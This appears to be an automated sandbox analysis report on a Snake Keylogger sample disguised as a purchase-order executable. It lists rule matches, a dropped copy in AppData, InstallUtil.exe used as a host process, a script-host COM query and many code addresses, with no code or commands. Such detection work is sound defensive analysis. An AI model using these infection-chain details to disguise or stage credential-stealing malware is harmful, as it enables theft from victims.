Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1308353668.00000000040F4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1308353668.0000000003ED1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO_63738373663838____________________________________________________________________________.exe PID: 7248, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Keywords.exe PID: 8144, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: InstallUtil.exe PID: 2632, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: PO_63738373663838____________________________________________________________________________.exe

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_0148E0D0	0_2_0148E0D0
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_01481765	0_2_01481765
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_0148A1D8	0_2_0148A1D8
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_0148A1E8	0_2_0148A1E8
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_0148A82B	0_2_0148A82B
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_0148A838	0_2_0148A838
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075DEC40	0_2_075DEC40
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075DE050	0_2_075DE050
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075C0040	0_2_075C0040
Source: C:\Users\user\Desktop\PO_63738373663838____________________________________________________________________________.exe	Code function: 0_2_075C0026	0_2_075C0026
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01716120	7_2_01716120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171F017	7_2_0171F017
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171B338	7_2_0171B338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171C457	7_2_0171C457
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171C763	7_2_0171C763
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01716748	7_2_01716748
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171B7E3	7_2_0171B7E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_017146D9	7_2_017146D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_01719868	7_2_01719868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171CA43	7_2_0171CA43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171BAC0	7_2_0171BAC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171BDA0	7_2_0171BDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171E538	7_2_0171E538
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171E527	7_2_0171E527
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171B503	7_2_0171B503
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_0171C480	7_2_0171C480
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8C9D8	7_2_05C8C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8BD38	7_2_05C8BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8B0A0	7_2_05C8B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8A408	7_2_05C8A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8D028	7_2_05C8D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8C388	7_2_05C8C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C88B58	7_2_05C88B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8B6E8	7_2_05C8B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8AA58	7_2_05C8AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8D670	7_2_05C8D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C88608	7_2_05C88608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8C9C8	7_2_05C8C9C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C885F8	7_2_05C885F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8518B	7_2_05C8518B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85198	7_2_05C85198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C811A0	7_2_05C811A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C881A0	7_2_05C881A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C881B0	7_2_05C881B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80D48	7_2_05C80D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87D48	7_2_05C87D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87D58	7_2_05C87D58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87900	7_2_05C87900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8BD28	7_2_05C8BD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80D39	7_2_05C80D39
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C808E0	7_2_05C808E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C808F0	7_2_05C808F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C878F0	7_2_05C878F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80488	7_2_05C80488
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80498	7_2_05C80498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87497	7_2_05C87497
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8B097	7_2_05C8B097
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C874A8	7_2_05C874A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80040	7_2_05C80040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87040	7_2_05C87040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C87050	7_2_05C87050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C80006	7_2_05C80006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C82807	7_2_05C82807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C82818	7_2_05C82818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8D018	7_2_05C8D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C84430	7_2_05C84430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86BC1	7_2_05C86BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86BD0	7_2_05C86BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8A3F8	7_2_05C8A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C833A8	7_2_05C833A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C833B8	7_2_05C833B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86768	7_2_05C86768
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86778	7_2_05C86778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8C378	7_2_05C8C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86311	7_2_05C86311
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C86320	7_2_05C86320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C83730	7_2_05C83730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85EC8	7_2_05C85EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8B6D9	7_2_05C8B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8DEA0	7_2_05C8DEA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8F2A0	7_2_05C8F2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85EB8	7_2_05C85EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8AA48	7_2_05C8AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85A60	7_2_05C85A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C8D662	7_2_05C8D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85A70	7_2_05C85A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85609	7_2_05C85609
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 7_2_05C85618	7_2_05C85618
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183E0D0	11_2_0183E0D0
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_01831765	11_2_01831765
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A1E7	11_2_0183A1E7
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A1E8	11_2_0183A1E8
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A837	11_2_0183A837
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0183A838	11_2_0183A838
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0784EC40	11_2_0784EC40
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07830036	11_2_07830036
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_07830040	11_2_07830040
Source: C:\Users\user\AppData\Roaming\Keywords.exe	Code function: 11_2_0784E050	11_2_0784E050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271B328	12_2_0271B328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271F007	12_2_0271F007
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02716108	12_2_02716108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C19F	12_2_0271C19F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C751	12_2_0271C751
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C470	12_2_0271C470
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271CA3F	12_2_0271CA3F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02714AE7	12_2_02714AE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271BBD6	12_2_0271BBD6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02719858	12_2_02719858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_02716880	12_2_02716880
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271BEBF	12_2_0271BEBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271F014	12_2_0271F014
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271F00C	12_2_0271F00C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C75F	12_2_0271C75F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C475	12_2_0271C475
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271C47F	12_2_0271C47F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271B4F2	12_2_0271B4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271E523	12_2_0271E523
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271E528	12_2_0271E528
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0271E517	12_2_0271E517
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06218460	12_2_06218460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06213870	12_2_06213870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210040	12_2_06210040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06217D90	12_2_06217D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062111C0	12_2_062111C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621C638	12_2_0621C638
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621F600	12_2_0621F600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621F610	12_2_0621F610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621FA68	12_2_0621FA68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621C648	12_2_0621C648
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621FA59	12_2_0621FA59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621CAA0	12_2_0621CAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621CA90	12_2_0621CA90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621CEEA	12_2_0621CEEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621CEF8	12_2_0621CEF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621D340	12_2_0621D340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621D350	12_2_0621D350
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621D7A8	12_2_0621D7A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621D798	12_2_0621D798
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062173E8	12_2_062173E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621DBF1	12_2_0621DBF1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210035	12_2_06210035
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621DC00	12_2_0621DC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621001F	12_2_0621001F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06213860	12_2_06213860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621386B	12_2_0621386B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E049	12_2_0621E049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E058	12_2_0621E058
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062104A0	12_2_062104A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E4A0	12_2_0621E4A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E4B0	12_2_0621E4B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210490	12_2_06210490
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210494	12_2_06210494
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621B4E8	12_2_0621B4E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062108F0	12_2_062108F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E8F8	12_2_0621E8F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621B4D7	12_2_0621B4D7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621B930	12_2_0621B930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210900	12_2_06210900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621E908	12_2_0621E908
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210D60	12_2_06210D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621ED60	12_2_0621ED60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621B940	12_2_0621B940
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210D51	12_2_06210D51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621ED50	12_2_0621ED50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06210D59	12_2_06210D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621F1A9	12_2_0621F1A9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062111B0	12_2_062111B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062111B4	12_2_062111B4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621F1B8	12_2_0621F1B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621BD88	12_2_0621BD88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621BD98	12_2_0621BD98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621C1E0	12_2_0621C1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0621C1F0	12_2_0621C1F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06248608	12_2_06248608
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624D670	12_2_0624D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624AA58	12_2_0624AA58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624B6E8	12_2_0624B6E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624C388	12_2_0624C388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624D028	12_2_0624D028
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624A408	12_2_0624A408
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06248C51	12_2_06248C51
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624B0A0	12_2_0624B0A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624BD38	12_2_0624BD38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062411A0	12_2_062411A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624C9D8	12_2_0624C9D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F237	12_2_0624F237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F23B	12_2_0624F23B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06248602	12_2_06248602
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624560A	12_2_0624560A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245618	12_2_06245618
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245A60	12_2_06245A60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624D662	12_2_0624D662
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245A70	12_2_06245A70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F273	12_2_0624F273
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624AA48	12_2_0624AA48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624F2A0	12_2_0624F2A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245EB8	12_2_06245EB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06245EC8	12_2_06245EC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624B6D9	12_2_0624B6D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06246320	12_2_06246320
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06243730	12_2_06243730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06246312	12_2_06246312
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06246778	12_2_06246778
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624C378	12_2_0624C378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062433A8	12_2_062433A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_062433B8	12_2_062433B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624A3F8	12_2_0624A3F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06246BC1	12_2_06246BC1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06246BD0	12_2_06246BD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240022	12_2_06240022
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06244430	12_2_06244430
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06242807	12_2_06242807
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06242809	12_2_06242809
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_0624D018	12_2_0624D018
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06240040	12_2_06240040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247049	12_2_06247049
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 12_2_06247050	12_2_06247050
